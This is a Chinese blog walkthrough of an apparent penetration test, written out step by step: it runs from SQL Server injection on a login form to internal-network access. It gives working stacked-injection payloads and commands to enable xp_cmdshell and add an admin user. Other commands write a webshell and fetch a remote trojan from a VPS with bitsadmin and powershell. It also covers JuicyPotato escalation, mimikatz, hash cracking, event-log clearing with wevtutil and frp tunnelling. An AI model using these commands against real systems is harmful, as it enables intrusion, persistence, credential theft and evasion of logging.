渗透实训-从sql server到内网遨游

于 2024-04-16 17:25:17 发布
阅读量951 收藏 11
点赞数 13
文章标签: 安全 python 代码审计
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_73648490/article/details/137833065
版权

*声明:*请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。合法渗透,本文章内容纯属虚构,如遇巧合,纯属意外。

0x00 前言

最近从各种文档中抽身出来,终于有空完成组织上交给我的渗透任务了!

0x01 发现注入

开幕雷击,网站存在源码泄露,遂下载下来进行审核。

1.第一处注入点

列数太多,直接flask开跑

image-20240326110341244

image-20240326110354974

python sqlmap.py -u "http://127.0.0.1:5000?id=1" --dbms "Microsoft SQL Server"

image-20240326110616100

跑出来布尔盲注,我们跑库得出如下库

image-20240326110953994

但是进一步深入的时候遇到问题

image-20240326112246843

爆不出表

os

--os-shell又gg

多尝试了几次,发现这个sql注入点拿不到任何东西,恋恋不舍的放弃。

2.第二处注入点

关注太多未授权,没想到简简单单的登录框也有sql注入??

image-20240326114441851

sqlmap验证一下

python sqlmap.py -r 1.txt --level=3 --ignore-code=500 --dbms "Microsoft SQL Server"

可以时间盲注和堆叠注入

看到了shell的可能

image-20240326115043236

0x02 寻找网站绝对路径

image-20240326115227384

爆了下库,发现数据库还不一样??莫非是站库分离???目前还暂时不知道,先拿到shell再说

判断是否当前是dba权限

admin';WAITFOR DELAY '0:0:5'--
admin';if(1=(select is_srvrolemember('sysadmin'))) WAITFOR DELAY '0:0:5'--

发现没有延时,应该不是dba权限

用sqlmap确定一下

–-is-dba

image-20240326115909120

false,但是通过is_member('db_owner'),判断出为dbo权限,不知道会不会对接下来的渗透造成影响

查看是否站库分离

admin';if(host_name()=@@servername) WAITFOR DELAY '0:0:5'--

image-20240326120057589

不是站库分离

查看是否有xp_cmdshell

admin';if(1=(select count(*) from master.dbo.sysobjects 
where xtype = 'x' and name = 'xp_cmdshell')) WAITFOR DELAY '0:0:5'--

image-20240326120250398

存在xp_cmdshell!午饭有着落了,如果不存在就gg了,审了半天也没其他漏洞了。

开启xp_cmdshell

开启xp_cmdshell
​
exec sp_configure 'show advanced options', 1;reconfigure;
exec sp_configure 'xp_cmdshell',1;reconfigure;
​
关闭xp_cmdshell
​
exec sp_configure 'show advanced options', 1;reconfigure;
exec sp_configure 'xp_cmdshell', 0;reconfigure

后续权限维持也自然而然(当然此处我们先跳过这步,一步一步来)

exec master..xp_cmdshell 'net user test pinohd123. /add'    添加用户test,密码test
exec master..xp_cmdshell 'net localgroup administrators test add'    添加test用户到管理员组

这里我偷懒直接os-shell,但执行命令无回显

image-20240326143821206

无奈开启写入木马操作

此时需要得到网站绝对路径才能getshell

找一个网站中的文件,使用xp_cmdshell 使用命令 dir得到其路径

image-20240326121449005

比如这个引入文件

/layer/layer.js

又或者favicon.ico之内的

先利用堆叠注入创建一个表

admin';use tempdb;create table kkp (tmp1 varchar(1000));--
admin';create table tempdb.kkp (tmp1 VARCHAR(1000));--

用sqlmap看看创表是否成功

发现,没有写入成功,接着我尝试创建一个新的数据库也没有成功。

很奇怪,可能做了很安全的系统配置,当前用户只有读的权限,无写的权限

这个时候不死心的再次尝试,不使用其它database,直接创个表

admin';CREATE TABLE cmddir (dir varchar(8000));--&txtPwd=1%27+or+1%3D1%2B

然后sqlmap再次验证

image-20240326150911872

发现成功写入,但database名字确实是另外一个,应该是无法向其他的database进行写入,只有这个数据库的写入权限

接下来开始查找路径

admin';insert into cmddir (dir) exec master..xp_cmdshell 'dir /s /b d:\favicon.png';--

但表单没变化,证明该文件应该在c盘或者其它盘,挨个试就行

admin';INSERT INTO cmddir (dir) exec master..xp_cmdshell 'dir /s /b c:\favicon.png';--

这里建议最好多试几个

我这里又遇到bug,写了好几个都没有写入

然后我又尝试利用xp_cmdshell写入回显命令,发现没有回显

我以为试xp_cmdshell没有成功开启的原因

但--os-shell又连的上,也是没有回显

遂再次放弃。

去找该网站上另外一些有用的东西、

惊喜发现了!?!

山重水复疑无路,柳暗花明又一村

旁站,搭建系统一模一样,且漏洞也存在,经过测试:为dba权限

image-20240326162557574

重头再来一下

重复过程这里在此省略

image-20240326163301849

成功之后,他的回显时间会非常长

这里多试几个

但这里可能因为服务器超时的原因,导致我们的表没有写入,多试几次

image-20240326175200561

这里终于成功写入

image-20240326175745619

居然跑出了2819条。

且存在巨多很像的对应目录??

不像一个一个试,肿么办?

我这里觉得应该是dir下面有很多文件,xp_cmdshell应该不出意外会被搞在 C:\Windows\system32目录下,导致会出现很多无用文件

所以不要只执行dir命令

image-20240326180638869

执行寻找指纹命令后,这里就只有9条对应目录了,

image-20240326181339590

我先选择webservice那条进行写入

admin';exec master..xp_cmdshell 'echo test >d:\\DATA\\webservice\\assets\\i\\1.txt';--

选择了几条,终于最后一条才成功(什么运气)

image-20240326182002307

0x03 打点

exec master..xp_cmdshell 'echo 木马 > d:\\DATA\\js-web\\assets\\i\\123.aspx';--

将木马写入web路径后

image-20240326182649102

连接不上,这个时候也没多想,以为可能单纯存在流量监测。

直接尝试进行远程下载远程免杀马

image-20240326184020136

certutil好似被限制了

试试bistadmin

bitsadmin /transfer down /download /priority normal "http://vps/aspx.txt" d:\DATA\js-web\login1.txt
powershell -exec bypass -c (new-object System.Net.WebClient).DownloadFile('http://vps/aspx.txt','d:\DATA\js-web\login1.txt')

查看对应目录发现也没有写入

但在执行dir命令查看当前目录时,发现webshell是能写入的,继续重回webshell,本来想直接上免杀马,但我又觉得这样有点老旧的站点不该上新型的一句话木马

首先写入web路径txt看一看系统权限

image-20240326191652602

image-20240416171042142

这里我尝试将写入的txt文件直接copy成aspx文件

image-20240327182937020

100.txt呈现的是正确的内容,但当转换为aspx的时候

会报如下错误

image-20240326222303052

上网搜的时候说是清理浏览器缓存的问题

这个时候f12点开发现存在cookie的header头,于是抱着试试态度试在webshell管理工具中加入cookie

image-20240327183813357

终于可以吃晚饭了

0x04 本机渗透提权加信息收集

先进行一下本机信息收集

image-20240328121601379

windows server2012

在线查杀

image-20240328121722626

存在火绒和小红伞

生成免杀木马上线

image-20240328121809717

image-20240328121904967

成功上线,

但是只是net权限,进行提权

直接juicypotato

image-20240328122116623

成功提权至system权限

接下来常规本机信息收集

image-20240328122448365

无域环境

查看在线用户

image-20240328123110656

上传fscan被杀,看来要想办法更新一波fscan了

去重新更新变异了一下fscan的流量,有兴趣的可以看看我之前fscan免杀的文章

这里成功上传之后直接拿下一大波环境,名单如下

1.三台h3c弱口令
2.三台打印机,可换墨粉自动打印
3.ikuai存在sql注入
4.一个工程系统

这个一会儿再说,先试试能不能远程登录。

最高权限mimikatz 获取明文密码

无明文密码,只拿到hash

实施爆破

john hash.txt --wordlist=/usr/share/john/password.lst --format=NT --fork=4

image-20240328141310919

不能成功。

尝试本地添加账号管理员

image-20240328160023289

rdp上去失败,但通过命令查看rdp开放在3381端口,但无法连接

wevtutil cl "Windows PowerShell"

查看防火墙,处于关闭状态

此处产生了疑惑。可能是端口处于内网中,上传免杀frp

./2s -c frps.ini
./2c -c frpc.ini

image-20240405222451745

rdesk vps:port

成功登录

image-20240405222516637

上来就看到火绒,典

0x05 内网遨游

挂上socks代理后美美遨游内网

弱口令第一处

弱口令第二处

image-20240415215939735

能看到大量网段资产,可惜不存在命令注入

image-20240415220905608

弱口令第三处

image-20240416170546562

且后台存在sql注入,且同样存在xp_cmdshell,打进去之后无旁站和其他特殊信息,因此不再记录

0x06 总结

1.当渗透进行不下去的时候可以找找有无旁站
2.xp_cmdshell实现命令时若无回显,可尝试寻找web路径进行写入

关注微信公众号:剑客古月的安全屋   获取更多最新渗透消息

原文链接:渗透实训-从sql server到内网遨游

月金剑客
关注
  • 13
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值